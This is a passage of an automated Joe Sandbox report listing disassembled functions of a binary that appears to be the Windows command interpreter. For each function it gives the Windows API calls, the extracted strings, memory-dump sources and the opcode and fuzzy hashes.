                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: FindHeap$AllocCloseErrorFileLastProcess$FirstNext
                                                                      • String ID:
                                                                      • API String ID: 3609286125-0
                                                                      • Opcode ID: 227343f4a8c0bb61fe787f8858aac94e452972ad6fe8c334fc3707f5b5ec6674
                                                                      • Instruction ID: 0bf8aa8afb81ebce2effd0ada91aff5ed4095c9469d5c830562022879ed7c97f
                                                                      • Opcode Fuzzy Hash: 227343f4a8c0bb61fe787f8858aac94e452972ad6fe8c334fc3707f5b5ec6674
                                                                      • Instruction Fuzzy Hash: AF31C031605A00EFFB148F64DC28A6A3BF5FB45327F244619E89A932E0D73D9849EF11
                                                                      Function 00067460 Relevance: 13.6, APIs: 9, Instructions: 66filenativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00067483
                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00067495
                                                                      • fprintf.MSVCRT ref: 000674BB
                                                                      • fflush.MSVCRT ref: 000674C9
                                                                      • TryAcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04), ref: 000674E2
                                                                      • NtCancelSynchronousIoFile.NTDLL(00000000,00000000), ref: 000674F8
                                                                      • ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04), ref: 000674FF
                                                                      • _get_osfhandle.MSVCRT ref: 0006751C
                                                                      • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00067524
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalExclusiveLockSection$AcquireBufferCancelConsoleEnterFileFlushInputLeaveReleaseSynchronous_get_osfhandlefflushfprintf
                                                                      • String ID:
                                                                      • API String ID: 3139166086-0
                                                                      • Opcode ID: 52ad6fa4c1942606554bc37782bc2e8a2e7b9849a21a81b8997c3ba93c4b8c3d
                                                                      • Instruction ID: a3f3f56c2840bc0b3f93559d4b4cc59b113d0fb61892a2bf50685211467231ea
                                                                      • Opcode Fuzzy Hash: 52ad6fa4c1942606554bc37782bc2e8a2e7b9849a21a81b8997c3ba93c4b8c3d
                                                                      • Instruction Fuzzy Hash: D2113B30604600AFFB252B64EC0EB6A3F69FF05719F00001AF54E914B2DBBD8981CB12
                                                                      Function 00044E3B Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 135nativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _setjmp3.MSVCRT ref: 00044E78
                                                                        • Part of subcall function 00048E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00088BF0,00000000,?), ref: 00048EC3
                                                                        • Part of subcall function 0004DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0004ACD8,00000001,?,00000000,00048C23,-00000105,0006C9B0,00000240,00051E92,00000000,00000000,0005ACE0,00000000), ref: 0004DCE1
                                                                        • Part of subcall function 0004DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0004ACD8,00000001,?,00000000,00048C23,-00000105,0006C9B0,00000240,00051E92,00000000,00000000,0005ACE0,00000000,00000000), ref: 0004DCE8
                                                                      • NtQueryInformationProcess.NTDLL ref: 00044F28
                                                                      • NtSetInformationProcess.NTDLL ref: 00044F46
                                                                      • NtSetInformationProcess.NTDLL ref: 00044FAE
                                                                      • longjmp.MSVCRT(00080A30,00000001,00000000), ref: 000591C8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Information$Heap$AllocCurrentDirectoryQuery_setjmp3longjmp
                                                                      • String ID: %9d$P,Fw
                                                                      • API String ID: 4212706909-3698535272
                                                                      • Opcode ID: 0f34b14bc9005fc20a56eaa3abcec69c1be04a5543f1683d208acefb58680567
                                                                      • Instruction ID: 589b3bc044dc82ac652f570af79c064936c586499d49b92415cccd09b7c0d2f1
                                                                      • Opcode Fuzzy Hash: 0f34b14bc9005fc20a56eaa3abcec69c1be04a5543f1683d208acefb58680567
                                                                      • Instruction Fuzzy Hash: 424165B0E04710EFE714DF69DC06B6ABBF4FB84710F10412AEA59E7290DBB84940CB95
                                                                      Function 00054875 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 376COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00051D90: _wcsnicmp.MSVCRT ref: 00051E14
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BCA7
                                                                        • Part of subcall function 0004BC30: iswspace.MSVCRT ref: 0004BD1D
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD39
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD5D
                                                                        • Part of subcall function 00054BAF: _wcsnicmp.MSVCRT ref: 00054C1A
                                                                        • Part of subcall function 00054BAF: _wcsnicmp.MSVCRT ref: 00060B39
                                                                      • memset.MSVCRT ref: 00054975
                                                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,-00000001,00000000,-00000001,00000104,00000000,00000001), ref: 00054ABC
                                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00054AF4
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00054AFF
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,00000000), ref: 00054B28
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsnicmpwcschr$ErrorLast$AttributesFileiswspacememset
                                                                      • String ID: COPYCMD
                                                                      • API String ID: 1068965577-3727491224
                                                                      • Opcode ID: 3b0589a146f8af64c43f538e282d5811c8490827bf890f454099582692d775e0
                                                                      • Instruction ID: 1fe38ed24c96b5ca291ffa38fddb04835bf6586038d00ea4ca89bd16379371c5
                                                                      • Opcode Fuzzy Hash: 3b0589a146f8af64c43f538e282d5811c8490827bf890f454099582692d775e0
                                                                      • Instruction Fuzzy Hash: FFD1D135A002168BDB28DF68C895ABBB3F2EF58304F558569D80AD7281EB34ED85CB51
                                                                      Function 00047A34 Relevance: 9.3, APIs: 6, Instructions: 338COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00047A9C
                                                                      • memset.MSVCRT ref: 00047AC7
                                                                        • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
                                                                        • Part of subcall function 0004DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0004ACD8,00000001,?,00000000,00048C23,-00000105,0006C9B0,00000240,00051E92,00000000,00000000,0005ACE0,00000000), ref: 0004DCE1
                                                                        • Part of subcall function 0004DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0004ACD8,00000001,?,00000000,00048C23,-00000105,0006C9B0,00000240,00051E92,00000000,00000000,0005ACE0,00000000,00000000), ref: 0004DCE8
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,00007FE9,?,?,?,?,00000000,?), ref: 00047BCA
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,00007FE9,?,?,?,?,00000000,?), ref: 00047BDC
                                                                      • longjmp.MSVCRT(00080A30,00000001,00007FE9,00007FE9,?,?,?,?,00000000,?), ref: 0005AE5B
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: memset$Heap$AllocProcesslongjmp
                                                                      • String ID:
                                                                      • API String ID: 2656838167-0
                                                                      • Opcode ID: 581e295dd17a90c878fbaa0bd6edbd8d60324aa5cca666b44d099953c2e8fbdd
                                                                      • Instruction ID: 0c23aff8a2b1c90f0edb355dbdb821dc96399910bfc4438f525a029983c5d079
                                                                      • Opcode Fuzzy Hash: 581e295dd17a90c878fbaa0bd6edbd8d60324aa5cca666b44d099953c2e8fbdd
                                                                      • Instruction Fuzzy Hash: DDD1E4B0A042159BDF78DF24C8957AEB7B1FF05301F4441ADD90EA7681DB70AE84CB99
                                                                      Function 00046E57 Relevance: 9.3, APIs: 6, Instructions: 326COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave
                                                                      • String ID:
                                                                      • API String ID: 3168844106-0
                                                                      • Opcode ID: 5283b641b7d1721d9d51079d637e0ef28c4b7af30ec14645759fde1de79a8b04
                                                                      • Instruction ID: a00841dc806656bb08aebdfc3b2bbd9ca310c6084f059df0f54e30a814a865e0
                                                                      • Opcode Fuzzy Hash: 5283b641b7d1721d9d51079d637e0ef28c4b7af30ec14645759fde1de79a8b04
                                                                      • Instruction Fuzzy Hash: 1FC1B3716083018FD764EF24C851A6BB7E2EF99304F04897DEC8687352EB35D949CB96
                                                                      Function 00062E37 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0(?,?,00062FDD), ref: 00062E5D
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: DebuggerPresent
                                                                      • String ID:
                                                                      • API String ID: 1347740429-0
                                                                      • Opcode ID: 82336f1864a524b1d3790781bbac8ac67168c886a38aa2aede7602195fb0215d
                                                                      • Instruction ID: 0ea5e392c945151aba57203a8936f717cfeac9c737af0dc5b73ad4087109f20c
                                                                      • Opcode Fuzzy Hash: 82336f1864a524b1d3790781bbac8ac67168c886a38aa2aede7602195fb0215d
                                                                      • Instruction Fuzzy Hash: E7E0C230742B219FFB222B645C883B936CE2B32B14B280476E891DB151C75F9C049BA0
                                                                      Function 00049458 Relevance: 42.3, APIs: 15, Strings: 9, Instructions: 328threadprocessstringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000001,00000000,00000020,0006C9D0,00000108,00052107,?,00000000,00000000,00000000), ref: 000494AA
                                                                      • UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00060001,?,00000004,00000000,00000000,?,00000000,00000000,00000000), ref: 000494D9
                                                                      • memset.MSVCRT ref: 000494F1
                                                                      • memset.MSVCRT ref: 0004954A
                                                                      • GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000044), ref: 0004955D
                                                                        • Part of subcall function 00051D90: _wcsnicmp.MSVCRT ref: 00051E14
                                                                      • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(00000000,\XCOPY.EXE), ref: 000495B8
                                                                      • CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 00049602
                                                                      • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00049624
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 0005BDF1
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 0005BE0D
                                                                      • DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000000), ref: 0005BE26
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: AttributeProcThread$ErrorLastListmemset$CloseCreateDeleteHandleInfoInitializeProcessStartupUpdate_wcsnicmplstrcmp
                                                                      • String ID: $%01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$D$H$\XCOPY.EXE
                                                                      • API String ID: 1449572041-3461277227
                                                                      • Opcode ID: 27068372b539e2e4e079ab3d68791b871267f170f294d51f144f9158789dd73b
                                                                      • Instruction ID: d23a03576fb2fffa03ac74112316eb3e2ca68bc86fb0fe98ad2f7ea18f240339
                                                                      • Opcode Fuzzy Hash: 27068372b539e2e4e079ab3d68791b871267f170f294d51f144f9158789dd73b
                                                                      • Instruction Fuzzy Hash: CCC1A1B0A003149FEB649F64CC45BEF77B8EB45305F1440BAEA4AD6241EB789D84CF66
                                                                      Function 0004E0B0 Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 308COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsicmp$iswspace
                                                                      • String ID: =,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                      • API String ID: 759518647-875390083
                                                                      • Opcode ID: 017c0afd254d34880f0dae34b5e411499e883473c225ef5b03eed4e3d2e7c902
                                                                      • Instruction ID: a9f32ea89b6cf1a94195750317fe81dbc61c0b0fc5fdf8908ec25327b7818831
                                                                      • Opcode Fuzzy Hash: 017c0afd254d34880f0dae34b5e411499e883473c225ef5b03eed4e3d2e7c902
                                                                      • Instruction Fuzzy Hash: 39A10BB134420386FB786B65AC49B7B23A4FF41712F14443AF9424A5D2EFB89849C71F
                                                                      Function 0004EC2E Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 139COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,0006E590,00002000,?,00088BF0,00000000,?,?,00048F0D), ref: 0004EC51
                                                                      • _wcsicmp.MSVCRT ref: 0004EC77
                                                                      • _wcsicmp.MSVCRT ref: 0004EC8D
                                                                      • _wcsicmp.MSVCRT ref: 0004ECA3
                                                                      • _wcsicmp.MSVCRT ref: 0004ECB9
                                                                      • _wcsicmp.MSVCRT ref: 0004ECCF
                                                                      • _wcsicmp.MSVCRT ref: 0004ECE5
                                                                      • _wcsicmp.MSVCRT ref: 0004ECF7
                                                                      • _wcsicmp.MSVCRT ref: 0004ED0D
                                                                        • Part of subcall function 00049310: GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,0006E590,?,00002000), ref: 00049342
                                                                        • Part of subcall function 00049310: SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00049356
                                                                        • Part of subcall function 00049310: FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 0004936A
                                                                        • Part of subcall function 00049310: FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 0004937E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsicmp$Time$File$System$EnvironmentLocalVariable
                                                                      • String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                      • API String ID: 2447294730-2301591722
                                                                      • Opcode ID: e65b21cf0676ab6a6bcbbe66d1c39e10def2d9e6a2580c8db3688df3d1e3ac90
                                                                      • Instruction ID: 2fd1cd4330a2ff09907a43667d813a502a26526cc64591d38e172944667a7632
                                                                      • Opcode Fuzzy Hash: e65b21cf0676ab6a6bcbbe66d1c39e10def2d9e6a2580c8db3688df3d1e3ac90
                                                                      • Instruction Fuzzy Hash: 8431FAB2709741BBB7145721EC4EA6F279DFB86321B14443BF506D04C1EF6C9501836E
                                                                      Function 00069C2E Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 250COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _wcsupr.MSVCRT ref: 00069CC8
                                                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000000,?), ref: 00069D22
                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00069D2A
                                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00069D3A
                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00069D50
                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00069D58
                                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00069D68
                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00069D7C
                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00069DDB
                                                                      • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00069DE2
                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,00000001,?), ref: 00069DF2
                                                                      • towupper.MSVCRT ref: 00069E13
                                                                        • Part of subcall function 0004A16C: _close.MSVCRT ref: 0004A19B
                                                                      • wcschr.MSVCRT ref: 00069E6A
                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00069E9B
                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00069EA9
                                                                        • Part of subcall function 0004DD98: _get_osfhandle.MSVCRT ref: 0004DDA3
                                                                        • Part of subcall function 0004DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0005C050), ref: 0004DDAD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_close_get_osfhandle_wcsuprtowupperwcschr
                                                                      • String ID: <noalias>$CMD.EXE
                                                                      • API String ID: 2015057810-1690691951
                                                                      • Opcode ID: 7579fa74778c8085dd0ace3798328bc529ba879f06eff6e377fa87480318fc38
                                                                      • Instruction ID: 392f4cfb90270d86f07badac2dabed6a3329021d111be37a99321bb938f2501f
                                                                      • Opcode Fuzzy Hash: 7579fa74778c8085dd0ace3798328bc529ba879f06eff6e377fa87480318fc38
                                                                      • Instruction Fuzzy Hash: 8C81F672A00214ABEF149FB4DC459EEBBFEAF46720F14012AF802E7591EB359D41CB65
                                                                      Function 0004790C Relevance: 28.7, APIs: 19, Instructions: 208COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00049A11: _get_osfhandle.MSVCRT ref: 00049A1C
                                                                        • Part of subcall function 00049A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0004793A,00000104,?), ref: 00049A2B
                                                                        • Part of subcall function 00049A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374,-00000001), ref: 00049A47
                                                                        • Part of subcall function 00049A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374), ref: 00049A56
                                                                        • Part of subcall function 00049A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374), ref: 00049A61
                                                                        • Part of subcall function 00049A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374,-00000001), ref: 00049A6A
                                                                      • _get_osfhandle.MSVCRT ref: 00047943
                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374,-00000001), ref: 00047951
                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00080AF0,000000A0,00000000,00000000,00000000,?,00000104,?), ref: 000479BE
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,00000104,?), ref: 00047A1C
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00047A27
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Console$ErrorLastLockShared_get_osfhandle$AcquireBufferFileHandleInfoModeReleaseScreenTypeWrite
                                                                      • String ID:
                                                                      • API String ID: 2173784998-0
                                                                      • Opcode ID: 9d18159e99c1cd16d960864c800da643d3ab4a729b2891c7dba2cf076dd2f291
                                                                      • Instruction ID: d57f4813b4ca52628ef93a432be14eea2290a07c7d177c478e863770340737ff
                                                                      • Opcode Fuzzy Hash: 9d18159e99c1cd16d960864c800da643d3ab4a729b2891c7dba2cf076dd2f291
                                                                      • Instruction Fuzzy Hash: 197171B1A00214AFEB24DFA4DC88ABEBBB9FF45311F14452AE946E6650DB389C44CB51
                                                                      Function 00062859 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 165windowthreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000,?,?,?), ref: 00062931
                                                                      • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00062998
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentFormatMessageThread
